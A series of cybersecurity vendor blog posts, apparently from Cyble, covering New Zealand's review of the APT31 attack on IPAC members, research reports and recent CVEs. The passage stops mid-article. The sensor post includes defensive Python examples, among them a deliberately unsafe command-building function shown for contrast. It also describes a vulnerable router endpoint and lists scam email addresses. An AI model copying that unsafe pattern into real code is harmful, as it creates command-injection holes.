NCSC Implements Key Improvements Following IPAC Review of Cyber Threats


Overview

New Zealand’s Government Communications Security Bureau (GCSB), through its National Cyber Security Centre (NCSC), has implemented a series of measures to strengthen the country’s defenses against malicious cyber activity.

This follows a thorough review of practices concerning cyberattacks targeting members of the Inter-Parliamentary Alliance on China (IPAC), an organization committed to addressing the growing influence of China’s policies on global security and governance.

The review was initiated in May 2024 by Lisa Fong, the Deputy Director-General of Cyber Security at GCSB. Fong recognized a need for improvement after concerns arose over how the NCSC responded to a cyber incident involving IPAC members. These concerns were particularly focused on the NCSC’s handling of reports related to state-sponsored cyber activities and the broader implications of such incidents on national security.

IPAC members, who represent a coalition of lawmakers across various countries, were targeted in a large-scale cyberattack by APT31, a Chinese state-sponsored hacker group. The attack included over 1,000 emails sent to more than 400 IPAC-associated accounts, compromising the sensitive communications of numerous politicians. Despite the seriousness of the attack, many victims were not informed of the breach by their respective governments, prompting an outcry from international lawmakers.

To address these concerns and strengthen the NCSC’s cybersecurity protocols, a thorough review of the NCSC’s procedures was carried out, culminating in a report published in July 2024. The review focused on the NCSC’s handling of the cyberattack, assessing both the technical response and the broader implications for security and intelligence management.

Key Findings and Recommendations

The review highlighted several areas where the NCSC could improve its procedures. While the NCSC did not identify any successful compromises of classified information, it did detect numerous phishing attempts targeting the parliamentary email addresses of IPAC members. The review’s key recommendations included the following:

  1. Broader Consideration of Implications: The NCSC needed to expand its focus beyond the technical response to cyber incidents. It was recommended that the NCSC develop a more comprehensive approach, one that not only addresses immediate technical threats but also considers the wider geopolitical and societal impacts of cyberattacks.
  2. Enhanced Engagement with Targeted Individuals: The review called for greater engagement with individuals who had been targeted by foreign state-sponsored actors. This recommendation emphasized the need for a more proactive communication strategy to ensure that those affected by cyber threats are informed in a timely manner.
  3. Improved Briefing Procedures: The review also stressed the importance of enhancing the NCSC’s process for briefing the Minister Responsible for the GCSB and their office. Effective communication at all levels of government was seen as crucial for a coordinated and quick response to cyber threats.
  4. Public Guidance for High-Profile Individuals: As part of the review’s fourth recommendation, the NCSC developed and published new guidance on its website for New Zealanders considered “high-profile individuals.” This initiative was designed to offer advice on how to protect against cyberattacks, particularly for those in sensitive roles who might be more likely to become targets.

NCSC’s Response and Implementation

Following the review, the NCSC wasted no time in implementing the recommended changes. Lisa Fong confirmed that all identified improvements had been quickly actioned. “I’m pleased to confirm that we have put in place measures to address all recommendations outlined in the initial review,” said Fong in a statement.

The NCSC took several steps to strengthen its internal processes. These included updating procedures to ensure better alignment with international best practices, particularly in managing incidents involving foreign state-sponsored cyber activity. New internal guidance and standards were also established for NCSC staff to ensure that similar concerns do not arise in the future.

Ms. Fong further explained that while these improvements completed the review’s immediate actions, the NCSC remained committed to continuously enhancing its cybersecurity practices. “We are committed to identifying opportunities for improvement in our practices and procedures and implementing these where we have the ability to do so,” she said.

International Reactions to the Attack

The attack on IPAC members was not an isolated incident but part of a broader pattern of state-sponsored cyber activities targeting global political figures and institutions. Following the attack, several countries with IPAC members took important steps to address the breach and secure their own digital infrastructures.

Canada was one of the countries most affected by the attack, with 18 parliamentarians targeted, including prominent figures such as Garnett Genuis MP and John McKay MP. In response, these members issued a joint statement demanding an explanation as to why they were not notified about the cyberattack sooner. Public debates, including a call for a privileged debate in the House of Commons, highlighted the urgency of addressing these security lapses.

In Belgium, lawmakers, including Representative Els van Hoof and former Prime Minister Guy Verhofstadt, were targeted. These individuals, along with others, rallied political leaders to pursue legal action, pushing for both a parliamentary inquiry and potential criminal proceedings against those responsible.

Meanwhile, in New Zealand, former IPAC co-chairs Simon O’Connor and Louisa Wall, along with other targeted figures such as academic Anne-Marie Brady, pressed the government to ensure that MPs would be informed of similar threats in the future. In response to these concerns, the GCSB initiated a public inquiry, promising to provide further assurances to the affected individuals.

Elsewhere, countries such as France, Germany, and Italy saw similar reactions from their political leaders, who demanded accountability from their respective security agencies and called for international sanctions against APT31. These coordinated international efforts reflect the growing recognition of the threat posed by foreign state-sponsored cyberattacks on democratic institutions.

Broader Cybersecurity Context

The NCSC’s actions come at a time of heightened global concern about the security of democratic institutions and their susceptibility to cyber threats. State-sponsored actors, particularly those associated with China, have increasingly targeted foreign governments, institutions, and political figures to advance geopolitical objectives. The focus on IPAC members is part of a larger trend of foreign interference in democratic processes through digital means, including espionage and disinformation campaigns.

To counter this growing threat, New Zealand’s NCSC has worked closely with international partners such as the United Kingdom’s National Cyber Security Centre (NCSC), alongside its own parent agency, the GCSB. These agencies have exchanged information and best practices to strengthen cyber defenses against these threats.

Moreover, the NCSC is actively collaborating with the IPAC to enhance global cybersecurity cooperation, ensuring that targeted individuals and organizations receive timely and accurate information about potential threats. This international collaboration is essential to developing a unified, effective approach to defending against state-sponsored cyberattacks.

Conclusion

The review and subsequent improvements undertaken by the NCSC represent a significant step in enhancing New Zealand’s cybersecurity posture, particularly concerning foreign state-sponsored cyber activity. By acting swiftly on the recommendations of the IPAC review, the NCSC has not only addressed specific concerns raised by the targeted individuals but also ensured that its processes and practices are better aligned with international standards for cybersecurity.

As cyber threats continue to evolve, New Zealand’s commitment to continuous improvement and proactive engagement with global partners like the GCSB, NCSC, and IPAC will be an important factor in protecting the nation’s cybersecurity infrastructure and the integrity of its political institutions. As Lisa Fong emphasized, this is not the end of the journey but a part of the ongoing effort to protect New Zealand from emerging cyber risks.


The post NCSC Implements Key Improvements Following IPAC Review of Cyber Threats appeared first on Cyble.


Must-Read Cyble Research Reports of 2024: Trends and Key Takeaways


Of the many reports created by Cyble’s talented team of threat researchers this year, seven stand out for their unique and comprehensive insight into the contemporary threat landscape.

We’ll examine some of the key takeaways from the reports, including the changing nature of cyber threats and some surprising solutions readers may not have considered.

Here, then, are insights from seven key Cyble research reports from 2024 that you shouldn’t miss, from broad trends to sector-specific threats that affect us all.

Brand Impersonation and Counterfeit Products

E-Commerce and Brand Monitoring examines the underappreciated risks of counterfeit products and brand impersonation. It includes statistics and case studies that should disturb companies and consumers alike.

Two data points underscore the risks for everyone: 70% of consumers have unknowingly purchased counterfeit products online within the last year, and the average company loses almost $4 billion a year in sales because of counterfeit products.

The report examines the most targeted sectors and methods – and discusses detection technologies, solutions, and actions that can help address the problem.

How Threat Intelligence Became a Core Security Technology

The Year in Cyber Threat Intelligence is a comprehensive look at threat intelligence’s emergence as a central cybersecurity technology, including eight mergers that have remade the sector and revealed its strategic importance even for established security vendors.

The leading threat intelligence platforms have evolved into external attack surface management (EASM) solutions that address risks from the network perimeter to the cloud and beyond. Harnessing AI and vast computing resources, these solutions power a growth rate that’s more than twice as fast as the cybersecurity market as a whole.

Along the way, you’ll get insights into threat intelligence use and features you might not know about, including a few practices that can prevent major cyberattacks before they happen.

Healthcare’s Tough Year

Healthcare cyber incidents in 2024 got bigger and more dramatic than ever before, with crippling ransomware attacks and massive data breaches becoming all too common.

Cyble’s mid-year Healthcare Threat Landscape report looks at incidents from the first half of 2024 – and draws important big-picture inferences and trends from the data. One critical insight: Dark web monitoring is an underappreciated tool for detecting credentials, access, and data leaks before they become much bigger cyberattacks and issues.

The report looks at 10 cases where healthcare access credentials were offered for sale on the dark web. Such breaches can be an important indicator of future attacks for any organization, but they can be particularly dangerous in the healthcare sector. The report also looks at vulnerabilities, data exposures, and ransomware attacks that hit the sector this year.

Medical Device Insecurity

A second healthcare report from Cyble is also worth reading for its insights into the unique systems, devices and challenges that make healthcare security so difficult – and breaches so expensive. In fact, healthcare data breaches are more than 50% more expensive than breaches in any other industry.

Vulnerability Management in Healthcare IoT Devices reveals why healthcare security is so difficult, with a sprawling array of unsupported and insecure devices providing critical patient care – as well as ready access for hackers. Here are some of the disturbing data points from the report:

  • 75% of infusion pumps have unpatched security flaws.
  • 83% of medical imaging systems run on unsupported operating systems.
  • 98% of medical IoT device network traffic is unencrypted.
  • Over 50% of hospital IoT devices are vulnerable to attack.
  • Medical IoT devices were the root cause of 21% of all ransomware attacks in the healthcare sector.
  • Only 52% of companies conduct regular security audits for healthcare IoT devices.

You’ll come away from this report with new insight into healthcare security challenges – along with potential solutions.

Software Supply Chain Risks and Controls

Software supply chain attacks have become a near-daily occurrence, and attacks that come through trusted partners are particularly dangerous because of their privileged access to an organization’s data and environment.

Cyble’s Supply Chain Threats report looked at the many ways that supply chain attacks and vulnerabilities can occur, along with an extensive list of security controls organizations can use to reduce those risks.

The use of open-source components in commercial software adds to those risks, creating an opening for malicious packages and open-source vulnerabilities to enter the commercial supply chain.

As any IT vulnerability from a trusted supplier could be considered a supply chain risk, the section on controls is particularly important. A must for understanding our increasingly interconnected threat landscape.

Financial Cybersecurity

The financial sector was covered in multiple Cyble reports this year, but one stands out above the rest: Cyber Threat Intelligence for Financial Institutions is an exhaustive look at the threats facing financial services companies – along with solutions.

The nearly 5,000-word report enumerates the attack types, vulnerabilities, targets, regions, and threat groups that place the industry at high risk of attack – along with what to expect for threats, controls, and regulatory and compliance pressures in 2025. A must-read for anyone who depends on this vital engine of economic growth.

Transportation Security

The Transportation and Logistics report examines the vast cybersecurity risks that threaten to disrupt transportation and shipping – risks that have grown substantially with automation and AI.

The report looks at the specific vulnerabilities, threat groups, and hacktivists that target the transportation sector, along with the attack types the industry faces.

The report examines eight technologies that can help mitigate those risks. You’ll gain a greater appreciation for the many physical and geopolitical risks that transportation services must negotiate while getting people and goods to their intended destinations.

What’s Next from Cyble Threat Researchers?

In addition to regular reports on sector-specific and general threats, Cyble also publishes comprehensive monthly, semi-annual, and annual reports on the threat landscape that are available for free download. Cyble’s annual threat landscape report will be published in January in the Research Reports section – and will include predictions for 2025.

Cyble’s reports and blogs – along with thousands of daily bulletins sent to threat intelligence subscribers – offer critical, reasoned judgments and insights from seasoned threat researchers into the threats and vulnerabilities meriting priority attention, along with creative solutions to those challenges.

The post Must-Read Cyble Research Reports of 2024: Trends and Key Takeaways appeared first on Cyble.


IT Vulnerability Report: Cyble Urges Fixes for Apache Struts, Qualcomm & More


Overview

Cyble’s December 19 IT vulnerability report to clients highlighted nine vulnerabilities at high risk of attack, including five under active discussion on dark web forums.

Cyble vulnerability intelligence and dark web researchers also noted threat actor claims of zero-day vulnerabilities for sale affecting Palo Alto Networks devices and Chrome and Edge browsers.

In total, Cyble researchers examined 13 vulnerabilities and 8 dark web exploits to arrive at the list of vulnerabilities that security teams should prioritize for patching. At-risk products include Apache Struts, Qualcomm digital signal processors (DSPs), a WordPress plugin, a Bluetooth flaw affecting Ubuntu, and more.

The Week’s Top Vulnerabilities

CVE-2024-53677: This file upload logic vulnerability in the Apache Struts web application framework has been rated 9.5 severity by the Apache Software Foundation but is still undergoing NVD analysis. An attacker could exploit the vulnerability to manipulate file upload parameters to enable path traversal and potentially upload a malicious file that could be used to perform remote code execution. Recently, researchers disclosed that threat actors are attempting to exploit the vulnerability using public proof-of-concept exploits to allow remote code execution, and exploitation has also been discussed on dark web forums. Cyble also published a separate blog on this vulnerability.

Cyble researchers noted that there are nearly 200,000 vulnerable Apache Struts instances exposed to the internet (image below):

CVE-2024-43047: This vulnerability affects Qualcomm’s Digital Signal Processor (DSP) service, which is utilized in many Android devices. It allows for privilege escalation and arbitrary code execution, posing significant risks to affected systems. Google Project Zero flagged the vulnerability as actively exploited in October 2024, and Android received a fix in November 2024. Researchers also observed that the Serbian government exploited Qualcomm zero-days, including CVE-2024-43047, to unlock and infect Android devices with a new spyware family named “NoviSpy.”

CVE-2024-11972: The CVE identifier for this vulnerability has been reserved, but the record has not yet been published. The flaw affects the Hunk Companion WordPress plugin, which is designed to enhance functionality and build visually appealing websites without extensive coding knowledge. The vulnerability allows attackers to perform unauthenticated plugin installation through unauthorized POST requests, enabling them to install and activate other plugins that may contain known vulnerabilities. According to researchers, attackers are exploiting the vulnerability to install outdated plugins with known flaws from the WordPress.org repository. This gives them access to vulnerabilities that can lead to remote code execution (RCE), SQL injection, cross-site scripting (XSS), or the creation of backdoor admin accounts, posing significant risks to site security.

CVE-2023-45866: This medium-severity vulnerability affects Bluetooth HID Hosts in systems utilizing BlueZ, particularly in Ubuntu 22.04 LTS with the BlueZ 5.64-0ubuntu1 package. This vulnerability allows an unauthenticated peripheral HID device to initiate an encrypted connection, potentially enabling the injection of Human Interface Device (HID) messages without user interaction.

Vulnerabilities and Exploits on Underground Forums

Cyble Research and Intelligence Labs (CRIL) researchers also identified the following exploits and vulnerabilities discussed on Telegram channels and cybercrime forums, raising the risk that they will be exploited in attacks.

CVE-2024-28059: This critical security vulnerability, which was identified in the MyQ Print Server in versions prior to 8.2 (patch 43), allows remote attackers to gain elevated privileges on the target server.

CVE-2024-38819: This high-severity path traversal vulnerability in the Spring Framework specifically affects applications that utilize WebMvc.fn or WebFlux.fn functional web frameworks.

CVE-2024-35250: This high-severity privilege escalation vulnerability in the Microsoft Windows operating system specifically affects the kernel-mode driver.

CVE-2024-40711: This critical vulnerability identified in Veeam Backup & Replication software allows for unauthenticated remote code execution (RCE) due to deserialization of untrusted data.

CVE-2023-27997: This heap-based buffer overflow vulnerability in certain FortiOS and FortiProxy versions may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests, specifically affecting SSL VPNs.

Threat actors were also observed offering a zero-day exploit weaponizing a vulnerability claimed to be present on Palo Alto Network’s PAN-OS VPN-supported devices (asking price: $60,000) and a zero-day exploit weaponizing a vulnerability allegedly present in Chrome and Edge (asking price: $100,000).

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents, including ransomware-resistant backups. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching exploitable vulnerabilities in sensitive products and vulnerabilities that could be weaponized as entry points for wider attacks. With increasing discussion of these exploits on dark web forums, organizations must stay vigilant and proactive.

Implementing strong security practices is essential for protecting sensitive data and maintaining system integrity. A comprehensive threat intelligence solution like Cyble can monitor for threats and leaks specific to your environment, allowing you to respond quickly to events and prevent them from becoming wider incidents.

The post IT Vulnerability Report: Cyble Urges Fixes for Apache Struts, Qualcomm & More appeared first on Cyble.


Cyble Sensors Detect Attacks on Ivanti, PHP, SAML, Network Devices, and More


Overview

Cyble honeypot sensors detected dozens of vulnerabilities under attack in the threat intelligence leader’s most recent sensor intelligence report, including fresh attacks on an Ivanti vulnerability.

Threat actors also targeted vulnerabilities affecting PHP and the Ruby SAML library. Cyble’s Dec. 19 report noted that unpatched networks and IoT devices remain popular targets for hackers looking to breach networks and add to botnets.

The report also looked at Linux and Windows exploits, common brute-force attacks, and phishing campaigns.

Vulnerabilities Under Attack

Cyble detected fresh attacks on CVE-2024-7593, a critical authentication bypass vulnerability in the authentication algorithm implementation of Ivanti’s Virtual Traffic Manager (vTM), excluding versions 22.2R1 and 22.7R2. The 9.8-severity vulnerability can allow a remote, unauthenticated attacker to bypass admin panel authentication. It was added to CISA’s Known Exploited Vulnerabilities catalog in September, one of 11 Ivanti vulnerabilities CISA has added to the KEV catalog this year.

CVE-2024-4577 also remains under attack. The critical PHP vulnerability affects CGI configurations in PHP versions 8.1.* before 8.1.29; 8.2.* before 8.2.20; and 8.3.* before 8.3.8. The 9.8-severity vulnerability enables attackers to execute arbitrary commands through specially crafted URL parameters.

CVE-2024-45409, a vulnerability in the Ruby SAML library designed for implementing the client side of SAML authorization, also remains a frequent target for hackers. In versions 1.12.2 and earlier, and 1.13.0 to 1.16.0, the library fails to verify the signature of SAML Responses properly. The flaw allows an unauthenticated attacker with access to a signed SAML document (issued by the IdP) to forge a SAML Response or Assertion with arbitrary contents, enabling unauthorized login as any user within the affected system. The issue has been resolved in versions 1.17.0 and 1.12.3.

Network and IoT Devices Under Attack

Network and IoT devices remain particularly popular with threat actors, as they can provide entry points into networks as well as additional nodes in a botnet. With many devices with vulnerabilities from 2023 and earlier still unpatched, Cyble noted that the following network vulnerabilities remain particularly popular with attackers:

CVE-2023-20198, a 10.0-severity vulnerability in the web UI feature of the Cisco IOS XE operating system, is being chained with CVE-2023-20273 to gain root privileges in vulnerable devices.

CVE-2023-4966 is a sensitive information disclosure vulnerability in Citrix NetScaler ADC and NetScaler Gateways when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.

CVE-2023-1389 is a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface of TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
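The defect class behind CVE-2023-1389 is a request parameter spliced into a command string that a shell then interprets. As an added example (not TP-Link firmware code and not from Cyble), the following Python contrasts that pattern with the hardened form: validate the value against a strict shape and an allowlist, then invoke the program with an argument list and no shell. The program path /usr/sbin/set_region and the allowlist of country codes are assumptions made for the example.

```python
import re
import subprocess
from typing import List

# Assumed allowlist of ISO 3166-1 alpha-2 codes the device accepts (constructed subset).
ALLOWED_COUNTRIES = frozenset({"US", "GB", "DE", "FR", "JP", "NZ"})
# Exactly two uppercase letters; \A and \Z reject trailing newlines that $ would accept.
COUNTRY_RE = re.compile(r"\A[A-Z]{2}\Z")


class InvalidCountry(ValueError):
    """Raised when the supplied value is not a plain two-letter code on the allowlist."""


def build_command_unsafe(country: str) -> str:
    # The defective pattern: the raw parameter is concatenated into one string that
    # is later handed to a shell (popen()/os.popen()). Any shell metacharacter in
    # `country` changes what the shell runs. Shown only to contrast with the fix.
    return f"/usr/sbin/set_region {country}"


def validate_country(country: str) -> str:
    """Accept only a two-letter uppercase code that is on the allowlist."""
    if not COUNTRY_RE.match(country):
        raise InvalidCountry(f"country must be two uppercase letters, got {country!r}")
    if country not in ALLOWED_COUNTRIES:
        raise InvalidCountry(f"country {country!r} is not supported")
    return country


def build_command_safe(country: str) -> List[str]:
    # Validate first, then build an argv list. subprocess.run(argv) without
    # shell=True never starts a shell, so there is no command line to inject into.
    return ["/usr/sbin/set_region", validate_country(country)]


def run_safe(country: str) -> subprocess.CompletedProcess:
    """Execute the validated command without a shell (hypothetical binary; not run by the tests)."""
    return subprocess.run(build_command_safe(country), shell=False, check=True, capture_output=True)


def is_safe_input(country: str) -> bool:
    """Convenience predicate for request handlers: True only if the value passes validation."""
    try:
        validate_country(country)
    except InvalidCountry:
        return False
    return True


if __name__ == "__main__":
    for candidate in ("US", "nz", "US ls", "XX"):
        print(f"{candidate!r}: accepted={is_safe_input(candidate)}")
```

The allowlist is the stronger of the two checks: even a value that matches the regex is rejected unless the device actually supports it, so the validation does not depend on guessing which characters a shell treats specially.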

CVE-2023-46747 could allow undisclosed requests in F5 BIG-IP to bypass the configuration utility authentication, allowing an attacker with network access to the system through the management port and/or self-IP addresses to execute arbitrary system commands.

Vulnerabilities in real-time operating systems (RTOS) and embedded devices remain extremely popular with attackers, exposing operational technology (OT) networks with vulnerable devices to attack.

One last vulnerability hackers keep returning to is CVE-2023-47643, an unauthorized GraphQL Introspection vulnerability in the SuiteCRM Customer Relationship Management (CRM) system in versions before 8.4.2. The flaw allows an attacker to access the GraphQL schema without authentication, revealing all object types, arguments, functions, and sensitive fields such as UserHash. By understanding the exposed API attack surface, attackers can exploit this information to access sensitive data.
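A practical mitigation for the SuiteCRM issue described above is to stop serving introspection outside development. As an added example (not SuiteCRM code and not from Cyble), the Python below is a request-level gate that rejects queries using the `__schema` or `__type` root fields in production while still allowing `__typename`, which ordinary clients rely on. String literals and comments are blanked first so text inside them can neither trigger nor hide a match. The environment names and the sample queries are constructed for the example.

```python
import re
from typing import Tuple

# Introspection root fields. The trailing \b keeps "__typename" from matching,
# since clients legitimately request it on regular objects.
INTROSPECTION_RE = re.compile(r"\b__(schema|type)\b")
# GraphQL string literals (with escapes) and line comments.
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')
COMMENT_RE = re.compile(r"#[^\n]*")


def strip_literals(query: str) -> str:
    """Blank string literals and comments so their contents cannot affect the check."""
    return COMMENT_RE.sub("", STRING_RE.sub('""', query))


def contains_introspection(query: str) -> bool:
    """True if the query selects __schema or __type anywhere in its selection sets."""
    return INTROSPECTION_RE.search(strip_literals(query)) is not None


def gate_query(query: str, environment: str) -> Tuple[bool, str]:
    """Return (allowed, reason). Introspection is permitted only outside production."""
    if environment != "production":
        return True, "non-production environment"
    if contains_introspection(query):
        return False, "introspection disabled in production"
    return True, "ok"


# Constructed sample queries.
SAMPLES = {
    "schema dump": "{ __schema { types { name } } }",
    "single type": 'query Q { __type(name: "User") { fields { name } } }',
    "normal query": "{ user(id: 1) { name __typename } }",
    "literal only": '{ search(q: "__schema") { id } }',
}

if __name__ == "__main__":
    for label, q in SAMPLES.items():
        print(f"{label:13s} production -> {gate_query(q, 'production')}")
```

This gate belongs in front of the GraphQL endpoint as defence in depth; the primary control is the server's own setting for disabling introspection, and sensitive fields such as the UserHash mentioned above should additionally be removed from the schema or placed behind field-level authorization rather than merely hidden from discovery.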

Linux systems remain continually under attack by CoinMiner, Mirai Botnet, and IRCBot malware, while hundreds of WannaCry ransomware samples continue to be detected each week in Windows 10, Windows Server 2016, and older systems vulnerable to CVE-2017-0147.

Remote Protocols Targeted in Brute-Force Attacks

Remote access protocols, particularly VNC (port 5900), remain popular targets of brute-force attacks. Examining the ports most targeted by the top five attacker countries, attacks originating from the United States targeted ports 5900 (42%), 22 (36%), 3389 (14%), 80 (5%), and 23 (3%). Attacks originating from Russia targeted ports 5900 (81%), 445 (7%), 22 (5%), 23 (3%), and 1433 (3%). Attacks originating from the Netherlands, Jordan, and China mainly targeted ports 5900, 22, and 445.

Security analysts are advised to add security system blocks for frequently attacked ports (such as 22, 3389, 443, 445, 5900, and 3306).
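The per-country port percentages above are a simple aggregation over connection records, and the same pass yields the noisy source addresses worth blocking. As an added example (not Cyble's sensor code), the Python below parses a small constructed honeypot log, computes each country's port share the way the report presents it, lists sources that exceed an attempt threshold, and ranks the most-hit ports. The log format, addresses and counts are all constructed for the example.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed sample records; the field layout is an assumption, not Cyble's output.
# Addresses come from documentation ranges. One malformed line is included on purpose.
SAMPLE_LOG = """\
2024-12-15T10:00:01Z src=203.0.113.5 country=US dport=5900
2024-12-15T10:00:02Z src=203.0.113.5 country=US dport=5900
2024-12-15T10:00:03Z src=203.0.113.5 country=US dport=5900
2024-12-15T10:00:04Z src=203.0.113.5 country=US dport=22
2024-12-15T10:00:05Z src=203.0.113.9 country=US dport=22
2024-12-15T10:00:06Z src=198.51.100.7 country=RU dport=5900
2024-12-15T10:00:07Z src=198.51.100.7 country=RU dport=5900
2024-12-15T10:00:08Z src=198.51.100.7 country=RU dport=5900
2024-12-15T10:00:09Z src=198.51.100.7 country=RU dport=5900
2024-12-15T10:00:10Z src=198.51.100.8 country=RU dport=445
this line is not a record and must be skipped
2024-12-15T10:00:11Z src=192.0.2.20 country=NL dport=22
2024-12-15T10:00:12Z src=192.0.2.20 country=NL dport=22
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) country=(?P<cc>[A-Z]{2}) dport=(?P<port>\d+)$"
)


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse records into dicts; lines that do not match are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def port_share_by_country(events: List[Dict[str, str]]) -> Dict[str, List[Tuple[int, float]]]:
    """For each source country, destination ports with their percentage share, highest first."""
    per_country: Dict[str, Counter] = defaultdict(Counter)
    for e in events:
        per_country[e["cc"]][int(e["port"])] += 1
    shares = {}
    for cc, counts in per_country.items():
        total = sum(counts.values())
        shares[cc] = [(port, round(100 * n / total, 1)) for port, n in counts.most_common()]
    return shares


def noisy_sources(events: List[Dict[str, str]], threshold: int) -> List[str]:
    """Source addresses with at least `threshold` attempts, i.e. block-list candidates."""
    counts = Counter(e["src"] for e in events)
    return sorted(src for src, n in counts.items() if n >= threshold)


def top_ports(events: List[Dict[str, str]], limit: int = 5) -> List[int]:
    """Most-targeted destination ports across all sources."""
    counts = Counter(int(e["port"]) for e in events)
    return [port for port, _ in counts.most_common(limit)]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for cc, shares in port_share_by_country(evs).items():
        print(cc, ", ".join(f"{port} ({pct}%)" for port, pct in shares))
    print("block candidates:", noisy_sources(evs, threshold=4))
    print("top ports:", top_ports(evs))
```

The threshold in noisy_sources is deliberately a parameter: on a real sensor feed it should be tuned per port, since a handful of attempts against 5900 or 3389 from one address is already abnormal, while the same count against 80 may be benign crawling.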

New Phishing Campaigns Detected

Cyble detected 277 new scam and phishing email addresses in the most recent weekly report. Here are six notable ones, including subject lines:

 E-mail Subject                             | Scammer’s Email ID             | Scam Type        | Description
 Are you interested in investment           | Dave@oig.com                   | Investment Scam  | Unrealistic investment offers to steal funds or data
 UN Compensation Fund.                      | zagranica@usa.com              | Claim scam       | Fake compensation fund claim
 COMPENSATION FUND OF 5.5 MILLION DOLLARS.  | Info@uba.org                   | Claim scam       | Fake compensation fund email
 Funding projects up to USD 5 Billion       | noreply@order.eventbrite.com   | Investment Scam  | Unrealistic investment offers to steal funds or data
 HOTEL AND REAL ESTATE INVESTMENTS          | richardowenr928@gmail.com      | Investment Scam  | Fake hotel and real estate investment scam
 My Donation                                | test@cinematajrobi.ir          | Donation Scam    | Fake donation mail to steal money

Recommendations and Mitigations

Cyble researchers recommend the following security controls:

  • Blocking target hashes, URLs, and email info on security systems (Cyble clients received a separate IoC list).
  • Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.
  • Constantly check for attackers’ ASNs and IPs.
  • Block brute-force attack IPs and the targeted ports listed.
  • Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.
  • For servers, set up strong passwords that are difficult to guess.

Conclusion

With many active threats against both new and older vulnerabilities, organizations need to remain vigilant and responsive, patching wherever possible and applying mitigations where patching isn’t possible. The large number of brute-force attacks and phishing campaigns show that attackers remain active even heading into the holiday season.

To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive and layered security approach will be key in protecting defenses against exploitation and data breaches.

The post Cyble Sensors Detect Attacks on Ivanti, PHP, SAML, Network Devices, and More appeared first on Cyble.


Predictive Threat Intelligence – Predictions for 2025: The Future of CTI


Cybersecurity has long been an essential element of organizational defense, with the growing complexity and frequency of cyberattacks propelling the development of cybersecurity practices. Among these practices, Threat Intelligence (TI) has become a central element, helping organizations anticipate, understand, and counter various cyber threats. As we approach 2025, however, a new evolution in threat intelligence is emerging: Predictive Threat Intelligence (PTI).

While traditional Threat Intelligence (TI) focuses on collecting, analyzing, and sharing data on cyber threats after they occur, Predictive Threat Intelligence goes a step further. It uses advanced techniques, particularly AI (artificial intelligence) and machine learning (ML), to predict cyber threats before they materialize. This field holds great promise for proactively strengthening an organization’s cybersecurity posture by providing early warnings, reducing damage from potential attacks, and enabling defense strategies based on anticipatory insights.

What Is Cyber Threat Intelligence (CTI), and How Is It Different from Predictive Threat Intelligence (PTI)?

Cyber Threat Intelligence (CTI) is the practice of collecting, analyzing, and sharing data about cyber threats. By gaining insights into threat actors’ behavior and tactics, techniques, and procedures (TTPs), organizations can better understand potential cyber threats, allowing them to prepare, respond, and mitigate potential attacks.

Traditional Threat Intelligence tends to focus on reactive measures, where security teams analyze attack patterns after a breach or threat occurs. In contrast, Predictive Threat Intelligence (PTI) takes a more proactive stance. By leveraging AI and ML, PTI not only understands current cyber threats but also forecasts future attacks before they materialize.

Machine learning algorithms analyze large datasets, including historical threat data and emerging patterns, to predict the types of threats organizations might face in the near future. For example, if an AI model detects a surge in phishing attacks against a particular industry, it can alert organizations in that sector to prepare for a potential escalation in attacks. This predictive capability allows organizations to take precautionary measures before a threat becomes imminent.

Predictive Threat Intelligence enhances the traditional threat intelligence model by offering actionable, anticipatory insights that enable proactive security measures, such as patching vulnerabilities or reinforcing defenses against specific attack vectors before they are widely exploited. This shift from reactive to proactive cybersecurity is positioned to transform the way organizations approach risk management and threat mitigation.

Why Is Cyber Threat Intelligence (CTI) Important?

Understanding why Cyber Threat Intelligence (CTI) matters is key to appreciating its role in the cybersecurity ecosystem. As cyberattacks become increasingly damaging, the need for effective threat intelligence grows. Without comprehensive CTI, organizations would be left scrambling to respond to attacks, often too late to prevent significant damage.

CTI provides essential insights into cyber threats, including information about threat actors, their motives, and the vulnerabilities they exploit. With this knowledge, organizations can develop more robust defense mechanisms and avoid becoming targets for specific types of attacks.

The most compelling reason for investing in CTI is its ability to elevate organizational security beyond reactive measures. By enabling organizations to recognize online threats early, CTI empowers security teams to adopt a proactive security posture. Proactive defense strategies allow vulnerabilities to be patched before they can be exploited and preparations to be made for impending threats, all of which contribute to reducing the overall risk of a breach.

How Does Predictive Threat Intelligence Work?

